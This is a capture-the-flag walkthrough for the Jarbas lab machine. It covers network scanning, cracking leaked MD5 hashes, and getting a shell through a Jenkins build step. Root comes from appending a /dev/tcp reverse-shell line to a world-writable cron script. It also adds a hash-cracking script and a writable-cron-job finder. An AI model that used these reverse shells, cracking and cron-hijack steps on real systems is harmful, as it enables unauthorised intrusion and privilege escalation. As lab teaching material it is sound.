litemao-jarbas

1. Host discovery

Check the local host's IP addresses. Here the eth1 interface (192.168.16.128/24) is on the same network as the target.

┌──(kali㉿kali)-[~/桌面]
└─$ ip a                                             
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:0a:61:9a brd ff:ff:ff:ff:ff:ff
    inet 192.168.11.224/24 brd 192.168.11.255 scope global dynamic eth0
       valid_lft 84946sec preferred_lft 84946sec
    inet6 fe80::20c:29ff:fe0a:619a/64 scope link proto kernel_ll 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:0a:61:a4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.16.128/24 brd 192.168.16.255 scope global dynamic noprefixroute eth1
       valid_lft 257832sec preferred_lft 257832sec
    inet6 fe80::20c:29ff:fe0a:61a4/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Use arp-scan and nmap -sn to find live hosts. Excluding Kali itself (192.168.16.128) and the VMware virtual-network addresses (.1, .2, .254), the target must be 192.168.16.132. arp-scan only sees the local segment, and nmap -sn also falls back to ARP ping on a directly attached subnet, which is why both produce the same list.

┌──(kali㉿kali)-[~/桌面]
└─$ sudo arp-scan --interface=eth1 -l      
[sudo] password for kali:
Interface: eth1, type: EN10MB, MAC: 00:0c:29:0a:61:a4, IPv4: 192.168.16.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.16.1    00:50:56:c0:00:08       VMware, Inc.
192.168.16.2    00:50:56:f8:96:9c       VMware, Inc.
192.168.16.132  00:0c:29:6d:83:4e       VMware, Inc.
192.168.16.254  00:50:56:ed:76:cc       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sn 192.168.16.0/24                    
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 10:36 CST
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 4 hosts. Timing: About 0.00% done
Nmap scan report for 192.168.16.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.16.2
Host is up (0.000088s latency).
MAC Address: 00:50:56:F8:96:9C (VMware)
Nmap scan report for 192.168.16.132
Host is up (0.00010s latency).
MAC Address: 00:0C:29:6D:83:4E (VMware)
Nmap scan report for 192.168.16.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:ED:76:CC (VMware)
Nmap scan report for 192.168.16.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.99 seconds

2. Information gathering

Full TCP port scan over all 65535 ports:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -p- 192.168.16.132                                            
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 12:35 CST
Nmap scan report for 192.168.16.132
Host is up (0.00065s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

Extract the open ports into a shell variable for the follow-up scans. This assumes the full scan above was saved with -oA ports, which produces ports.nmap; the variable is misspelled prots in the commands below, which is harmless as long as it is used consistently.

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ','
22,80,3306,8080
   
┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ prots=$(grep open ports.nmap | awk -F '/' '{print $1}' | paste -sd ',')

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ echo $prots                 
22,80,3306,8080

Service and version scan on those ports. From the port 80 banner nmap identifies the OS as CentOS with PHP 5.4.16 behind Apache 2.4.6; port 3306 is a MariaDB server (MariaDB is a MySQL-compatible database server, not a management tool; "unauthorized" means our address is not allowed to connect); the OS fingerprint estimates a Linux 3.2-4.9 kernel. Note that the second command below only scanned 22,80,3306, so 8080 is missing from its output; it is examined by hand in the next section.

Port    Version
22      OpenSSH 7.4 (protocol 2.0)
80      Apache httpd 2.4.6 (CentOS), PHP/5.4.16
3306    MariaDB (unauthorized)
8080    http-proxy (not covered by this scan; Jenkins, see below)

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p $prots     # press Tab after $prots to expand it into the literal port list, then add the target

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sT --min-rate 10000 -sV -sC -O -p 22,80,3306 -oA detail 192.168.16.132       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:31 CST
Nmap scan report for 192.168.16.132
Host is up (0.00058s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
3306/tcp open  mysql   MariaDB (unauthorized)
MAC Address: 00:0C:29:6D:83:4E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds

UDP scan of the top 20 ports: only 68/udp (dhcpc) comes back open|filtered, which is expected for a DHCP-configured guest and gives nothing further.

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nmap -sU -top-ports 20 192.168.16.132 -oA udpscan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-02 11:44 CST
Nmap scan report for 192.168.16.132
Host is up (0.00046s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds

Next run nmap's vuln script category. --script=vuln selects every script tagged vuln; the separate dos category is not pulled in by that name (only scripts carrying both tags would run). The useful finding is that the 8080 service has a robots.txt. The http-csrf hits on port 80 are just forms without an anti-CSRF token, nothing exploitable here.

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p 22,80,3306,8080 192.168.16.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-05 13:06 CST
Nmap scan report for 192.168.16.132
Host is up (0.00028s latency).

PORT     STATE SERVICE                                                                                  
22/tcp   open  ssh                                                                                      
80/tcp   open  http                                                                                     
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                        
| http-csrf:                                                                                            
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.16.132                          
|   Found the following possible CSRF vulnerabilities:                                                  
|                                                                                                       
|     Path: http://192.168.16.132:80/                                                                   
|     Form id: wmtb
|     Form action: /web/submit
|     
|     Path: http://192.168.16.132:80/
|     Form id: 
|     Form action: /web/20020720170457/http://jarbas.com.br:80/user.php
|     
|     Path: http://192.168.16.132:80/
|     Form id: 
|_    Form action: /web/20020720170457/http://jarbas.com.br:80/busca/
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum: 
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:6D:83:4E (VMware)

Nmap done: 1 IP address (1 host up) scanned in 38.34 seconds

3. Finding vulnerabilities

First look at what port 80 serves. The content is not obviously meaningful, and none of its forms actually do anything: their actions point at /web/20020720170457/http://jarbas.com.br/... paths, i.e. this is a static archived copy of an old site rather than a live application.

Port 8080 is an admin login page. The top-left shows it is Jenkins (a CI/CD automation server, not a CMS), and the bottom-right shows the Jenkins version.

The robots.txt on 8080 is the Jenkins default: its comment says it does not want robots clicking "build" links, and it disallows everything.

Directory brute-forcing on port 80 with gobuster and dirb found nothing of value:

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

┌──(kali㉿kali)-[~]
└─$ sudo dirb http://192.168.16.132
-----------------
DIRB v2.22    
By The Dark Raver
----------------
START_TIME: Sat Apr  5 13:26:31 2025
URL_BASE: http://192.168.16.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612                                                          
---- Scanning URL: http://192.168.16.132/ ----
+ http://192.168.16.132/cgi-bin/ (CODE:403|SIZE:210)                                                   
+ http://192.168.16.132/index.html (CODE:200|SIZE:32808)                                         
-----------------
END_TIME: Sat Apr  5 13:26:33 2025
DOWNLOADED: 4612 - FOUND: 2

Switching gobuster to the medium wordlist and adding -x html,php finds a new file, access.html:

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.16.132/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php
[sudo] password for kali:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.16.132/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 661680 / 661683 (100.00%)
===============================================================
Finished
===============================================================

access.html is headed as a list of usernames and passwords. Each "password" is 32 hex characters, i.e. a 128-bit digest, almost certainly unsalted MD5 (a hash, not encryption, so the originals are recovered by guessing, not decrypting). hash-identifier agrees:

┌──(kali㉿kali)-[~]
└─$ sudo hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ \         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__\   / ,__\ \ \  _ \      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, \ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   [email protected] #
   #########################################################################
--------------------------------------------------
 HASH: 5978a63b4654c73c60fa24f836386d87

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: f463f63616cb3f1e81ce46b39f882fd5

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: 9b38e2b1e8b12f426b0d208a7ab6cb98

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH:

Save the user:hash pairs to user.hash and run john with a dictionary attack against rockyou.txt: two crack immediately (tiago and trindade); eder's is not in rockyou and was recovered with an online MD5 lookup. sudo is unnecessary for john and only sends its pot file to /root/.john, so a later john --show as the normal user would not see these results.

User        Password
tiago       italia99
trindade    marianna
eder        vipsu

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt user.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
marianna         (trindade)     
italia99         (tiago)     
2g 0:00:00:00 DONE (2025-04-05 15:31) 2.564g/s 18388Kp/s 18388Kc/s 19227KC/s  fuckyooh21..7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
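
What john is doing above, as an added example that is not part of the original writeup: a minimal unsalted-MD5 dictionary attack in POSIX sh. It assumes md5sum (coreutils) is available. The three user:hash lines are the ones from access.html; the short wordlist is constructed here as a stand-in for rockyou.txt so the block runs offline.

```shell
#!/bin/sh
# Added example, not code from the original writeup: a minimal unsalted-MD5
# dictionary attack in POSIX sh, the same work john --format=raw-md5 does.
# Needs md5sum (coreutils). The demo input is constructed here: the user:hash
# lines are the ones from access.html, the wordlist is a hand-made stand-in
# for rockyou.txt so that the block runs offline.

# md5_hex WORD -> lowercase hex MD5 of WORD. No trailing newline is hashed;
# hashing "word\n" by mistake is the classic reason a manual check "fails".
md5_hex() {
  printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# crack_md5 HASH WORDLIST -> prints the first matching word, exit 1 if none.
crack_md5() {
  target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  while IFS= read -r word || [ -n "$word" ]; do
    if [ "$(md5_hex "$word")" = "$target" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done < "$2"
  return 1
}

# crack_file USERHASH WORDLIST -> "user:password" for every line of the
# user:hash file that cracks; uncracked users are silently skipped.
crack_file() {
  while IFS=: read -r user hash; do
    if pw=$(crack_md5 "$hash" "$2"); then
      printf '%s:%s\n' "$user" "$pw"
    fi
  done < "$1"
  return 0
}

# Demo run: sh crack.sh demo
if [ "${1:-}" = "demo" ]; then
  d=$(mktemp -d)
  printf 'tiago:5978a63b4654c73c60fa24f836386d87\ntrindade:f463f63616cb3f1e81ce46b39f882fd5\neder:9b38e2b1e8b12f426b0d208a7ab6cb98\n' > "$d/user.hash"
  printf 'password\n123456\nitalia99\nmarianna\nvipsu\n' > "$d/words.txt"   # constructed wordlist
  crack_file "$d/user.hash" "$d/words.txt"
  rm -rf "$d"
fi
```

The per-candidate md5sum fork is why nobody does this for real wordlists (john manages tens of millions of candidates per second above); the point is the comparison itself: lowercase the target, hash the candidate without a newline, compare hex strings.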

SSH with these credentials does not work. Back on the Jenkins login page on 8080, eder:vipsu logs in successfully.

Click "New Item", choose Freestyle project, give it any name and click OK.
After it is created you land on the job's configuration page.

Scroll down to the "Build" section and open the "Add build step" dropdown. The target is Linux, so pick "Execute shell", put the reverse shell command in the box and save.

Before running the build, start a listener on Kali on port 1234:

┌──(kali㉿kali)-[~/靶机信息/vlunhub/jarbas]
└─$ sudo nc -lvnp 1234                                       
[sudo] password for kali:
listening on [any] 1234 ...

Click "Build Now": the build step runs the reverse shell and the listener receives a shell as the jenkins user.

4. Privilege escalation

Check who we are, the distribution and our privileges. We are the jenkins service user, and the kernel string 3.10.0-693.21.1.el7 pins the OS to CentOS 7. sudo -l cannot even prompt because the reverse shell has no tty (strictly this only shows that sudo wanted a password; since we have no password for jenkins, sudo is a dead end either way).

bash-4.2$ whoami
whoami
jenkins                                                                                                
bash-4.2$ id                                                                                           
id                                                                                                     
uid=997(jenkins) gid=995(jenkins) groups=995(jenkins) context=system_u:system_r:initrc_t:s0            
bash-4.2$ uname -a                                                                                     
uname -a                                                                                               
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux                                                                                                     
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified

Check whether /etc/passwd and /etc/shadow are readable: only passwd is. It shows one real user, eder, plus the apache, mysql and jenkins service accounts.

bash-4.2$ cat /etc/passwd                                                                              
cat /etc/passwd     

root:x:0:0:root:/root:/bin/bash                                                                  
bin:x:1:1:bin:/bin:/sbin/nologin                                                                 
daemon:x:2:2:daemon:/sbin:/sbin/nologin                                                          
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied

Look at scheduled tasks first. /etc/cron.d holds system-level cron job files. It contains only 0hourly, which at minute 01 of every hour runs run-parts over /etc/cron.hourly. That directory contains only 0anacron, a script that exits if anacron already ran today or if the machine is on battery power, and otherwise starts anacron. It is root-owned with mode 755, so we cannot write to it, and there is nothing to hijack here.

bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cd /etc/cron.d
cd /etc/cron.d                                                                                         
bash-4.2$ ls                                                                                           
ls                                                                                                     
0hourly                                                                                                
bash-4.2$ cat 0hourly                                                                                  
cat 0hourly                                                                                            

# Run the hourly jobs
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
01 * * * * root run-parts /etc/cron.hourly
bash-4.2$ ls -l                                                                                        
ls -l                                                                                                  
total 4                                                                                                
-rw-r--r--. 1 root root 128 Aug  3  2017 0hourly                                                 
bash-4.2$ cd /etc/cron.hourly 
cd /etc/cron.hourly 
bash-4.2$ ls
ls
0anacron
bash-4.2$ cat 0anacron
cat 0anacron
#!/bin/sh
# Check whether 0anacron was run today already
if test -r /var/spool/anacron/cron.daily; then
    day=`cat /var/spool/anacron/cron.daily`
fi
if [ `date +%Y%m%d` = "$day" ]; then
    exit 0;
fi

# Do not run jobs when on battery power
if test -x /usr/bin/on_ac_power; then
    /usr/bin/on_ac_power >/dev/null 2>&1
    if test $? -eq 1; then
    exit 0
    fi
fi
/usr/sbin/anacron -s
bash-4.2$ ls -l
ls -l
total 4
-rwxr-xr-x. 1 root root 392 Aug  3  2017 0anacron

Cron has more than /etc/cron.d. The other system crontab is /etc/crontab itself. It is root-owned and mode 644, so not writable by us (the ls -l below was run from /etc), but its single job is interesting: every five minutes root runs /etc/script/CleaningScript.sh with its output discarded to /dev/null (the redirection throws away output, not the script). CleaningScript.sh is mode 777, so anyone can modify it. Its current content just deletes the Apache access log. Anything we append to it will be executed as root within five minutes.

bash-4.2$ ls -l crontab
ls -l crontab
-rw-r--r--. 1 root root 513 Apr  1  2018 crontab

bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root


# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

bash-4.2$ cd /etc/script
cd /etc/script
bash-4.2$ ls -l
ls -l
total 4
-rwxrwxrwx. 1 root root 50 Apr  1  2018 CleaningScript.sh
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt

Start a listener on port 2233, then append a reverse shell to CleaningScript.sh. The job runs every five minutes, so expect a short wait. The bash /dev/tcp redirection is safe here because the script starts with #!/bin/bash and crontab sets SHELL=/bin/bash.

┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233              
listening on [any] 2233 ...

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.16.128/2233 0>&1" >> /etc/script/CleaningScript.sh    
bash-4.2$ cat CleaningScript.sh
cat CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.16.128/2233 0>&1

The listener receives a root shell (the SELinux context system_cronjob_t confirms it was spawned by cron):

┌──(kali㉿kali)-[~]
└─$ sudo nc -lnvp 2233              
[sudo] password for kali:
listening on [any] 2233 ...
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.132] 58976
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
[root@jarbas ~]#
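
The check that found CleaningScript.sh, generalised, as an added example that is not part of the original writeup: enumerate the jobs in /etc/crontab and /etc/cron.d (the seven-field system format with a user column) and report the ones whose command is a file the current user can modify. It assumes only awk and a POSIX sh; the crontab and scripts in the usage note are the real paths, while the test input is constructed.

```shell
#!/bin/sh
# Added example, not code from the original writeup: list system cron jobs
# (/etc/crontab and /etc/cron.d/*, "m h dom mon dow user command" format)
# whose command is a file writable by the current user, which is exactly
# the /etc/script/CleaningScript.sh condition exploited above.
# Caveat: [ -w ] is always true for root, so run this as the low-privileged
# user whose reach you are measuring, never from a root shell.

# cron_jobs FILE -> one "user command" pair per job line. Comments, blank
# lines and VAR=value lines are skipped; @reboot-style lines are handled.
cron_jobs() {
  awk '
    /^[[:space:]]*(#|$)/                   { next }   # comment or blank
    /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # SHELL=, PATH=, MAILTO=
    $1 ~ /^@/ && NF >= 3                   { print $2, $3; next }
    NF >= 7                                { print $6, $7 }
  ' "$1"
}

# writable_cron_jobs FILE... -> "user path" for each job whose command is an
# absolute path to an existing regular file that the caller may write.
writable_cron_jobs() {
  for f in "$@"; do
    cron_jobs "$f" | while read -r user cmd; do
      case "$cmd" in /*) ;; *) continue ;; esac   # relative names need a PATH lookup
      if [ -f "$cmd" ] && [ -w "$cmd" ]; then
        printf '%s %s\n' "$user" "$cmd"
      fi
    done
  done
  return 0
}

# Usage on a target (as the unprivileged user):
#   writable_cron_jobs /etc/crontab /etc/cron.d/*
# On Jarbas this prints: root /etc/script/CleaningScript.sh
```

Only the first word of the command is checked. A job like `root sh /etc/script/foo.sh` hides the interesting path behind the interpreter, and a job whose script is read-only but lives in a directory we can write to is just as exploitable (delete and recreate the file); both are worth a manual look at the raw `cron_jobs` output, which is why it is a separate function.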

Read the flag:

[root@jarbas ~]# cd /root
cd /root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt            
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!

This challenge was very easy, huh? =)

